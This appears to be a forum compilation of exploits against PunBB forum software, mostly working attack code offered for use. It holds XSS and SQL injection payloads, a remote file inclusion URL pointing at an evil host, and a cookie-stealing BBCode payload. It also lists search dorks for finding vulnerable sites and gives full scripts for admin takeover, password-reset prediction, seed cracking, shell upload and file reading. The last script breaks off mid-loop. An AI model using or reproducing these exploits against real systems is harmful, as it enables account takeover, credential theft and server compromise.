PunBB <= 1.2.14 Remote Code Execution Exploit
PunBB version <= 1.2.2 Authentication Bypass Exploit
ShAnKaR: multiple PHP application poison NULL byte vulnerability
PunBB 1.2.4 (change_email) SQL Injection Exploit

1.2.11
PHP:
index.php&req_subject=test&req_message=test"><script>alert(1);</script>

<= 1.2.16 (moderate.php)
PHP:
preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host']))
moderate.php?get_host=1.1.1.1<script>alert(1)</script>

<= 1.2.15 (message_popup.php) XSS code vulnerability
PHP:
<?php echo $lang_pms['Popup new'], $return['sender'], $lang_pms['Popup subj'], $return['subject'] ?><br><?php echo $lang_pms['Popup send'], format_time($return['posted']) ?>

<= 1.2.13 SQL Injection
PHP:
search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >/*]&1763905137=1&1121320991=1
dork: warning: ini_get has been

Remote File Inclusion in forum PunBB 1.1.2 >> 1.1.5
PHP:
include/common.php?pun_root=http://www.host_evil.com/cmd?&=id

PunBB <= 1.2.4 - change email to become admin exploit
Code:
#!/usr/bin/env python3
#######################################################################
#  _  _                _                    _       ___  _  _  ___
# | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|    |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
#######################################################################
# (ported from the original Python 2 script to Python 3; logic unchanged)

import getopt
import sys
import urllib.error
import urllib.parse
import urllib.request


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the Set-Cookie we need is on the login response itself."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_post(url, data, cookie=None):
    """POST a form and return the response headers (also for 3xx answers)."""
    req = urllib.request.Request(url, urllib.parse.urlencode(data).encode())
    if cookie:
        req.add_header('Cookie', cookie)
    opener = urllib.request.build_opener(NoRedirect())
    try:
        return opener.open(req).info()
    except urllib.error.HTTPError as err:
        return err.headers


def banner():
    print("PunBB 1.2.4 - change_email SQL injection exploit")
    print("Copyright (C) 2005 Hardened-PHP Project\n")


def usage():
    banner()
    print("Usage:\n")
    print("  $ ./punbb_change_email.py [options]\n")
    print("    -h http_url   url of the punBB forum to exploit")
    print("                  f.e. http://www.forum.net/punBB/")
    print("    -u username   punBB forum useraccount")
    print("    -p password   punBB forum userpassword")
    print("    -e email      email address where the admin level activation email is sent")
    print('    -d domain     catch all domain to catch "some-SQL-Query"@domain emails')
    print("")
    sys.exit(-1)


def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
    except getopt.GetoptError:
        usage()

    if len(sys.argv) < 11:      # script name plus five options with their values
        usage()

    username = password = email = domain = host = None
    for o, arg in opts:
        if o == "-h":
            host = arg.rstrip('/')
        if o == "-u":
            username = arg
        if o == "-p":
            password = arg
        if o == "-e":
            email = arg
        if o == "-d":
            domain = arg

    # Printout banner
    banner()

    # Check if everything we need is there
    if host is None:
        print("[-] need a host to connect to")
        sys.exit(-1)
    if username is None:
        print("[-] username needed to continue")
        sys.exit(-1)
    if password is None:
        print("[-] password needed to continue")
        sys.exit(-1)
    if email is None:
        print("[-] email address needed to continue")
        sys.exit(-1)
    if domain is None:
        print("[-] catch all domain needed to continue")
        sys.exit(-1)

    # Retrieve cookie
    params = {'req_username': username, 'req_password': password, 'form_sent': 1}
    print("[+] Connecting to retrieve cookie")
    info = http_post(host + "/login.php?action=in", params)
    if 'set-cookie' not in info:
        print("[-] Unable to retrieve cookie... something is wrong")
        sys.exit(-3)

    cookie = info['set-cookie']
    cookie = cookie[:cookie.find(';')]
    print("[+] Cookie found - extracting user_id")
    # the cookie is a urlencoded serialized PHP array: a:2:{i:0;s:N:"<user_id>";i:1;s:32:"<hash>";}
    user_id = cookie[cookie.find("%3A%22") + 6:cookie.find("%22%3B")]
    print("[+] User-ID: %d" % int(user_id))

    # Build the new address: a quoted local part (still a valid e-mail) that carries
    # the SQL fragment ',"', group_id='1 and is padded so that the part before "@domain
    # is exactly 50 characters; the activation mail goes to "<payload>"@domain, hence the
    # catch-all domain.
    email = '"' + email[:email.find('@')] + '"@' + email[email.find('@') + 1:] + ',"\','
    append = 'group_id=\'1'
    email = email + (((50 - len(append)) - len(email)) * ' ') + append + '"@' + domain

    params = {'req_new_email': email, 'form_sent': 1}
    print("[+] Connecting to request change email")
    http_post(host + "/profile.php?action=change_email&id=" + user_id, params, cookie)
    print("[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin")


if __name__ == "__main__":
    main()

PunBB BBCode URL Tag Script Injection Vulnerability
PHP:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://baba/sniffer.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

-punbb_users --id --group_id --username --password

Dork example:
intext:"Powered by PunBB 1.2.5"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7"
intext:"Powered by PunBB 1.1.0...7" OR "Powered by PunBB 1.2.0...7"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog -inurl:"page=info" -inurl:"page=all" -inurl:"showtopic"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog
Cryptographic attack

Cookie hashing algorithm:
PHP:
md5($cookie_seed.md5(password))

Example:
md5($cookie_seed.md5("123")) = "beae53ed5f767f344b03646a1aa5b16e"

The string value consists only of characters from the set "abcdef1234567890".

Cookie generation scheme:
PHP:
md5($cookie_seed.$pun_user['password'])

$pun_user['password'] is the sha1() or md5() hash of the user's password.
$cookie_seed is the salt (the "same" for every user).

Default algorithm used for $cookie_seed (config.php):
PHP:
function pun_hash($str)
{
    if (function_exists('sha1'))            // Only in PHP 4.3.0+
        return sha1($str);
    else if (function_exists('mhash'))      // Only if Mhash library is loaded
        return bin2hex(mhash(MHASH_SHA1, $str));
    else
        return md5($str);
}

PasswordPro has no md5(salt.md5(pass)) algorithm, so we use the "mask attack" method:
"Character set" for the user-defined mask:
?1: abcdef1234567890
Mask: ?1?1?1?1?1?1?1?1202cb962ac59075b964b07152d234b70
Length: 40-40

=== UPDATE: PasswordPro now has the corresponding module
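As an added illustration of the mask attack described above (this is added example code, not code from the post, from PasswordPro or from PunBB): the cookie hash is rebuilt exactly as the post states, md5($cookie_seed . md5(password)), and the seed is then recovered by enumerating every hex string the mask ?1...?1 covers. The seed "0d9f" and its 4-character length are constructed for the demo so the search finishes instantly; a real seed is 8 hex characters (the post's mask has eight ?1), i.e. 16^8 = 4294967296 candidates, which is why the post hands the job to a cracking tool. forge_cookie_hash is an inference from the scheme the post gives (md5($cookie_seed.$pun_user['password'])): once the seed is known, a user's cookie value follows from their stored password hash alone.

```python
import hashlib
import itertools
import string

HEX = string.digits + "abcdef"          # the post's mask charset ?1 = abcdef1234567890


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode()).hexdigest()


def punbb_cookie_hash(cookie_seed: str, password: str) -> str:
    """Cookie value as the post describes it: md5($cookie_seed . md5($password))."""
    return md5_hex(cookie_seed + md5_hex(password))


def forge_cookie_hash(cookie_seed: str, stored_password_hash: str) -> str:
    """md5($cookie_seed . $pun_user['password']): what a known seed buys you once a
    user's stored hash is known (inferred from the scheme in the post)."""
    return md5_hex(cookie_seed + stored_password_hash)


def recover_seed(cookie_hash: str, password_hash: str, seed_len: int):
    """Mask attack: cookie_hash = md5(seed . password_hash) with an unknown hex seed
    of seed_len characters, so enumerate the 16**seed_len candidates and stop at the
    first whose md5 matches. Returns None if no candidate matches."""
    target = bytes.fromhex(cookie_hash)
    suffix = password_hash.encode()
    for combo in itertools.product(HEX, repeat=seed_len):
        seed = "".join(combo)
        if hashlib.md5(seed.encode() + suffix).digest() == target:
            return seed
    return None


def keyspace(seed_len: int) -> int:
    """Number of candidates the mask ?1 * seed_len covers."""
    return len(HEX) ** seed_len


if __name__ == "__main__":
    # Constructed demo values: a 4-character seed (assumption, not a real forum's seed)
    seed, password = "0d9f", "123"
    cookie = punbb_cookie_hash(seed, password)
    print("md5('123')        =", md5_hex(password))   # 202cb962ac59075b964b07152d234b70
    print("cookie hash       =", cookie)
    print("recovered seed    =", recover_seed(cookie, md5_hex(password), len(seed)))
    print("forged (same)     =", forge_cookie_hash(seed, md5_hex(password)) == cookie)
    print("full keyspace (8) =", keyspace(8))
```

The only inputs the attack needs are one account's cookie value and that account's own password (its md5 is the fixed 32-character tail of the mask); everything else is the 16^8 enumeration, which is what the PasswordPro mask above expresses.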
PunBB <= 1.2.16 Blind Password Recovery Exploit
http://www.milw0rm.com/exploits/5165
Code:
<?php
/**
 * Original : http://sektioneins.de/advisories/SE-2008-01.txt
 * Thanks to Stefan Esser, here's the exploit.
 *
 * Team : EpiBite
 * firefox, petit-poney, thot
 * We would like to thank our respective mums and dads.
 * Let's get a fu*** coffee !
 */

// conf
define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base url
define('EMAIL', '[email protected]');                       // your email
define('LOGIN', 'login_x');                                // your login
define('PASS', '620553.8I73');                             // your pass

// Exploit
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL);

// 1. the user list sorted by registration date gives the admin and the forum's creation date
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
$s = curl_exec($h);
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m);
define('ADMIN', $m[2]);
preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m);
if (count($m))
    define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1]));
else
    define('DATE', time() - 86400); // just in case, the forum or account just has been created
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE);

// 2. a password request for our own address; the page links the admin's mail address
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 'req_email='.urlencode(EMAIL), 'request_pass=Envoyer')));
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m);
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set manually if there's problem)
printf("Admin mail : %s\n--\n", ADMIN_MAIL);

// 3. request a new password for the admin with an invalid cookie: the guest cookie set on
//    this response is md5(seed . random_pass(8)) from the same generator as the new password
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_COOKIE, 'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 => md5('bite')))));
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 'req_email='.urlencode(ADMIN_MAIL), 'request_pass=Envoyer')));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_NOT_LOGGUED', $c[1]);
printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED);

// 4. log in as ourselves; our cookie hash is md5(seed . sha1(PASS))
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 'redirect_url=index.php', 'req_username='.LOGIN, 'req_password='.PASS)));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_LOGGUED', $c[1]);
printf("Md5 loggued : %s\n--\n", MD5_LOGGUED);

// 5. the seed is the last 8 chars of md5(<install timestamp>): brute-force two days of
//    seconds from the creation date until our own cookie hash is reproduced
define('PASS_MD5ED', sha1(PASS));
$chars = array('/', '-', "\\", '|');
for ($p = 0; $p < 86400 * 2; $p++) {
    if (!($p % 300))
        echo $chars[($p / 300) % 4]."\r";
    if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)), -8).PASS_MD5ED)) == 0) {
        define('SEED', substr(md5(DATE + $p), -8));
        break;
    }
}
printf("Seed : %s\n--\n", SEED);

// 6. brute-force the mt_srand() seed (< 10^6) that produced the guest cookie's random_pass(8)
for ($p = 0; $p < 1000000; $p++) {
    if (!($p % 300))
        echo $chars[($p / 300) % 4]."\r";
    mt_srand((double)$p);
    if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0) {
        define('SRAND', $p);
        break;
    }
}
printf("SRAND : %s\n--\n", SRAND);

// 7. replay the generator: the first random_pass(8) went into the guest cookie, the
//    next is the new password and the one after that the activation key
mt_srand(SRAND);
random_pass(8);
printf("New password : %s\n--\n", random_pass(8));
$url = URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8); // Id is set to '2' (the admin's id, but you can change your target)
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_exec($h);

function random_pass($len)
{
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    $password = '';
    for ($i = 0; $i < $len; ++$i)
        $password .= substr($chars, (mt_rand() % strlen($chars)), 1);
    return $password;
}

# milw0rm.com [2008-02-21]
PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitrary file upload
PHP:
<?php
# PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload
# h3ck.[rv.ua], 2008

$host = 'localhost';                 # host
$path = '/punbb/';                   # path to the forum
$file_type = 'image/gif';
$file_name = 'sh1.gif.php';          # name of the uploaded file
$file_code = '<?php phpinfo(); ?>';  # code to execute
$cookie = 'punbb_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A32%3A%220b9ca83006024ac122e2b1c459c0804f%22%3B%7D'; # will not work without being logged in..

# a 1x1 GIF so the upload passes the image check; the PHP code is appended to it
$file_content = base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==');

$post_data = <<<POST
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="form_sent"

1
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="imagefile"; filename="$file_name"
Content-Type: $file_type

{$file_content}{$file_code}
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="uploadimg"

Submit
------------9cYrkcaQ3YTUyzCSnL8xD2--
POST;

$post_len = strlen($post_data);
$req = <<<REQ
POST http://{$host}{$path}uploadimg.php?subpage=upload HTTP/1.0
User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)
Host: $host
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: uk-UA,uk;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: $cookie
Content-Length: $post_len
Content-Type: multipart/form-data; boundary=----------9cYrkcaQ3YTUyzCSnL8xD2
Connection: Close

$post_data
REQ;

$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    echo "Sending... <pre>$req</pre>\n";
    fwrite($fp, $req);
    while (!feof($fp)) {
        echo fgets($fp);
    }
    fclose($fp);
}
?>
PunBB Migration Tool 1.4.0
Download URL:
Code:
http://punbb.er.cz/czmirror/PunBB_Migration_Tool-1.4.0.tar
Bug Type: Local File Inclusion
Bug In:
Code:
converters/index.php
Vulnerable Code (excerpt):
Code:
<?php
// Load a specific page
else {
    if (file_exists($_GET['page'] . '.php'))
        include $_GET['page'] . '.php';
    else
        include 'settings.php';
}
?>
Proof Of Concept:
http://www.website.com/[path]/converters/index.php?page=/etc/passwd%00
PunBB 1.2.17 SQL injection & file reader
Code:
v1.2.17 punbb.ru rev87

/message_popup.php
message_popup.php?id=0+UNION+SELECT+user_id,concat_ws(0x3a,table_name),2,3+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+<table number>,1
Find the table prefix from the table names.
-----------------------------------SQL<
/message_popup.php?id=0+union+select+user_id,username,3,password+from+[PREFIX]users+where+id=2
Get the admin's username and password hash.
-----------------------------------SQL<
download.php
/download.php?aid=9+union+select+1,file,3,user_id,null,1
Read files on the host.
-----------------------------------SQL<
user_id - your id on the forum, the account you are logged in with

By @Fatal@ aka Doom123
PHP:
<?php
/**
 * @author @Fatal@
 * @copyright HWT©2008
 *
 * PunBB expl0it
 *
 * The vulnerability exists because of insufficient filtering of
 * input data in download.php!
 *
 * The author takes no responsibility for the use of this script!
 * Use it at your own risk!
 *
 * Vulnerability found by @Fatal@.
 */

$error = '';

if (isset($_POST['start'])) {
    if (!empty($_POST['login']) && !empty($_POST['pass']) && !empty($_POST['host']) && !empty($_POST['id']) && !empty($_POST['path'])) {
        define("_HOST", $_POST['host']);
        define("_PORT", 80);

        // turn the Set-Cookie headers of a response into a Cookie: request header
        function cookie($ans)
        {
            $head = 'Cookie:';
            foreach ($ans as $val) {
                if (preg_match('#Set-Cookie:(.+)#is', $val, $pock)) {
                    $co = explode(';', $pock['1']);
                    $head .= ' ' . trim($co[0]) . ';';
                }
            }
            return $head . " \r\n";
        }

        function Prepare_POST_array($arr)
        {
            $out = '';
            foreach ($arr as $key => $line) {
                if ($out == '')
                    $out .= $key . '=' . urlencode($line);
                else
                    $out .= '&' . $key . '=' . urlencode($line);
            }
            return $out . "\r\n\r\n";
        }

        // raw HTTP request over a socket: POST when $param is given, GET otherwise
        function post_query($path, $param, $cook = '', $AnswerFlag = true)
        {
            $out = "POST " . $path . " HTTP/1.1\r\n";
            if ($param == array()) {
                $out = "GET " . $path . " HTTP/1.1\r\n";
                $data = "";
            } else
                $data = Prepare_POST_array($param);
            $fp = fsockopen(_HOST, _PORT, $errno, $errstr, 30);
            if (!$fp)
                return false;
            $out .= "Host: " . _HOST . "\r\n";
            $out .= "Content-Type: application/x-www-form-urlencoded; charset=windows-1251\r\n";
            $out .= "Content-Length: " . strlen($data) . "\r\n";
            $out .= "User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)\r\n";
            $out .= $cook;
            $out .= "Connection: Close\r\n\r\n";
            $out .= $data;
            fwrite($fp, $out);
            $answer = array();
            if ($AnswerFlag) {
                while (!feof($fp)) {
                    $answer[] = fgets($fp, 1024);
                }
            } else
                $answer = true;
            fclose($fp);
            return $answer;
        }

        $array = array(
            'form_sent'    => '1',
            'redirect_url' => 'index.php',
            'req_username' => $_POST['login'],
            'req_password' => $_POST['pass'],
        );
        $ans = post_query($_POST['path'].'login.php?action=in', $array);
        $a = cookie($ans);

        if ($_POST['method'] != 2) {
            if (!empty($_POST['nid'])) {
                if (empty($a))
                    $error = 'Wrong login or password';
                else {
                    // first try the unprefixed users table
                    $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3,'.$_POST['id'].',null,6+FROM+users+WHERE+id+like+'.$_POST['nid'];
                    $ans2 = post_query($page, array(), $a);
                    $str = implode('', $ans2);
                    if (strrpos($str, "doesn't exist (Errno: 1146)") !== false) {
                        // the MySQL error leaks the database name; look the real prefix up in information_schema
                        preg_match("# Table '(.+?)\.users' doesn't exist \(Errno: 1146\)#is", $str, $pock);
                        $hex = '0x'.bin2hex($pock[1]);
                        $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,table_name,3,'.$_POST['id'].',null,6+FROM+information_schema.columns+WHERE+table_schema+like+'.$hex;
                        $ans3 = post_query($page, array(), $a);
                        $str = implode('', $ans3);
                        preg_match('#PunBB reported</strong>: (.+?)attachments - this file does not exist#is', $str, $pock);
                        $pref = isset($pock[1]) ? $pock[1] : $_POST['prefix'];
                        $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3,'.$_POST['id'].',null,6+FROM+'.$pref.'users+WHERE+id+like+'.$_POST['nid'];
                        $ans2 = post_query($page, array(), $a);
                        $str = implode('', $ans2);
                    }
                    // the selected hash comes back inside the "file does not exist" error message
                    preg_match('#PunBB reported</strong>: (.{0,40}) - this file does not exist#is', $str, $pock);
                    echo "<center><b><h1>User hash: ".$pock[1]."</h1></b></center>";
                }
            } else
                $error = "Enter all data";
        } else {
            if (!empty($_POST['file'])) {
                if (empty($a))
                    $error = 'Wrong login or password';
                else {
                    // the injected string is used as the attachment's file name, so the script reads that path
                    $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,"'.$_POST['file'].'",3,'.$_POST['id'].',null,6';
                    $ans2 = post_query($page, array(), $a);
                    $i = 11;
                    while (array_key_exists($i, $ans2)) {
                        echo htmlspecialchars($ans2[$i]).'<br>';
                        $i++;
                    }
                }
            } else
                $error = "Enter all data";
        }
    } else
        $error = "Enter all data";
}

if ($error != '' || !isset($_POST['start'])) {
    echo '<center>'.$error."<BR><BR><b>PunBB Expl0it</b><br><br>";
    echo '<form method="post">';
    echo 'Host: <input type="text" name="host"><br>';
    echo 'Path: <input type="text" name="path"><br>';
    echo 'Prefix: <input type="text" name="prefix"><br>';
    echo 'Login: <input type="text" name="login"><br>';
    echo 'Password: <input type="text" name="pass"><br>';
    echo 'Your id: <input type="text" name="id"><br>';
    echo 'Target id: <input type="text" name="nid"><br>';
    echo 'File: <input type="text" name="file"><br>';
    echo 'Method: <select name=method><option value=1>Extract hash</option>';
    echo '<option value=2>View file</option></select><br>';
    echo '<input type="submit" name="start"></form>';
    echo '<br><br>Your id - the id of your own user';
    echo '<br>Target id - the victim\'s id (required for the first method)';
    echo '<br>File - path to the file (for the second method)';
    echo '<br>Path - the forum directory, e.g. /path/ (if the forum is not in a subdirectory, enter /)';
    echo '<br>Prefix - normally detected automatically, but if access is insufficient the value you enter is used';
    echo '<br><BR><BR>C0ded by @Fatal@ For HW Team</center>';
}
?>
XSS in PunBB 1.3RC
XSS in the very latest version, 1.3RC
Code:
http://punbb/1.3/style/Oxygen/Oxygen.php?base_url=Oxygen.css" onload=alert()> <!---&forum_user[style]=1
Multiple vulnerabilities in PunBB <= 1.2.19
PunBB versions up to 1.2.19.
The discovered vulnerabilities allow a remote user to perform an XSS attack and to bypass some security restrictions.
1. The vulnerability exists due to insufficient sanitisation of input data in the include/parser.php script. A remote user can, with a specially crafted request, execute arbitrary script code in the victim's browser in the security context of the vulnerable site.
2. The vulnerability exists due to an unknown error that allows a remote user to inject arbitrary SMTP commands.
Videos:
XSS in PunBB 1.x
Site defacement through a PunBB vulnerability (php include)
New PunBB vulnerability
PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit
http://www.milw0rm.com/exploits/7159
PHP:
<?php
error_reporting(0);
ini_set("default_socket_timeout", 5);

/*
  PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit
  -----------------------------------------------------------
  by athos - staker[at]hotmail[dot]it
  download mod http://www.punres.org/files.php?pid=52
  download cms http://punbb.org
  -----------------------------------------------------------
  register_globals = 1
  magic_quotes_gpc = 1

  Directory (files/include/pms)

  functions_navlinks.php?pun_user[language]=../../../../../etc/passwd
  profile_send.php?pun_user[language]=../../../../../etc/passwd
  viewtopic_PM-link.php?pun_user[language]=../../../../../etc/passwd

  ../../etc/passwd and nullbyte

  File (files/include/pms/functions_navlinks.php)

  1. <?php
  2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

  $pun_user['language'] isn't declared :D you can include any file
  functions_navlinks.php?pun_user[language]=../../../etc/passwd%00
  -------------------------------------------------------------------
  File (files/include/pms/header_new_messages.php)

  1. <?php
  2. if(!$pun_user['is_guest'] && $pun_user['g_pm'] == 1 && $pun_config['o_pms_enabled'] ){
  3. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

  $pun_user['g_pm'] isn't declared
  $pun_config['o_pms_enabled'] isn't declared
  header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=../etc/passd%00
  -------------------------------------------------------------------
  File (files/include/pms/profile_send.php)

  1. <?php
  2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

  $pun_user['language'] isn't declared
  profile_send.php?pun_user[language]=../../../../etc/passwd%00
  -------------------------------------------------------------------
  File (files/include/pms/viewtopic_PM-link.php)

  1. <?php
  2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

  $pun_user['language'] isn't declared
  viewtopic_PM-link.php?pun_user[language]=../../../../etc/passwd%00
  -------------------------------------------------------------------

  Usage:
  php [punbb.php] [host/path] [mode]
  php [punbb.php] [host/path] [save]
  php [punbb.php] [host/path] [NULL]

  Example:
  php punbb.php localhost/punbb save
  php punbb.php localhost/punbb

  NOTE: Don't add me on MSN Messenger
*/

$exploit = new Exploit;
$domain  = $argv[1];
$mymode  = $argv[2];

$exploit->starting();
$exploit->is_vulnerable($domain);
$exploit->exploiting($domain, $mymode);

class Exploit
{
    // send a raw request; return the matching HTTP error status line, or the whole response
    function http_request($host, $data)
    {
        if (!$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) {
            echo "socket_create() error!\r\n";
            exit;
        }
        if (!socket_set_option($socket, SOL_SOCKET, SO_BROADCAST, 1)) {
            echo "socket_set_option() error!\r\n";
            exit;
        }
        if (!socket_connect($socket, $host, 80)) {
            echo "socket_connect() error!\r\n";
            exit;
        }
        if (!socket_write($socket, $data, strlen($data))) {
            echo "socket_write() error!\r\n";
            exit;
        }
        $content = '';
        while ($get = socket_read($socket, 1024, PHP_NORMAL_READ)) {
            $content .= $get;
        }
        socket_close($socket);

        $array = array(
            'HTTP/1.1 404 Not Found',
            'HTTP/1.1 300 Multiple Choices',
            'HTTP/1.1 301 Moved Permanently',
            'HTTP/1.1 302 Found',
            'HTTP/1.1 304 Not Modified',
            'HTTP/1.1 400 Bad Request',
            'HTTP/1.1 401 Unauthorized',
            'HTTP/1.1 402 Payment Required',
            'HTTP/1.1 403 Forbidden',
            'HTTP/1.1 405 Method Not Allowed',
            'HTTP/1.1 406 Not Acceptable',
            'HTTP/1.1 407 Proxy Authentication Required',
            'HTTP/1.1 408 Request Timeout',
            'HTTP/1.1 409 Conflict',
            'HTTP/1.1 410 Gone',
            'HTTP/1.1 411 Length Required',
            'HTTP/1.1 412 Precondition Failed',
            'HTTP/1.1 413 Request Entity Too Large',
            'HTTP/1.1 414 Request-URI Too Long',
            'HTTP/1.1 415 Unsupported Media Type',
            'HTTP/1.1 416 Request Range Not Satisfiable',
            'HTTP/1.1 417 Expectation Failed',
            'HTTP/1.1 Retry With',
        );
        foreach ($array as $status) {
            if (stripos($content, $status) !== false) {
                return "$status\r\n";
            }
        }
        return "$content\r\n";
    }

    // magic_quotes_gpc escapes the injected quote; if the backslash comes back, the LFI won't work
    function is_vulnerable($host)
    {
        $host = explode('/', $host);
        $header  = "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n";
        $header .= "Host: $host[0]\r\n";
        $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
        $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $header .= "Accept-Language: en-us,en;q=0.5\r\n";
        $header .= "Connection: close\r\n\r\n";

        if (stristr($this->http_request($host[0], $header), "\\'")) {
            echo "[+] Magic Quotes GPC/Register Globals On!\n";
            echo "[+] Exploit Failed!\n";
            exit;
        } else {
            return false;
        }
    }

    function starting()
    {
        global $argv;
        if (empty($argv[1]) or preg_match('#^http://#i', $argv[1])) {
            echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n";
            echo "[+] by athos - staker[at]hotmail[dot]it\r\n";
            echo " -----------------------------------------------------------\r\n";
            echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
            echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
            echo "[+] Usage: php $argv[0] [host/path] \r\n";
            exit;
        }
    }

    function exploiting($host, $mode)
    {
        $host = explode('/', $host);
        echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
        echo "[+] Local File: ";
        $file = stripslashes(trim(fgets(STDIN)));
        if (empty($file))
            die("you fail");

        $array = array(
            "functions_navlinks.php?pun_user[language]=$file",
            "profile_send.php?pun_user[language]=$file",
            "viewtopic_PM-link.php?pun_user[language]=$file",
            "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file",
        );

        // try each vulnerable script in turn until one returns the file
        // (no Accept-Encoding header: a gzip reply could not be read from the raw socket)
        foreach ($array as $target) {
            $write  = "GET /$host[1]/files/include/pms/$target HTTP/1.1\r\n";
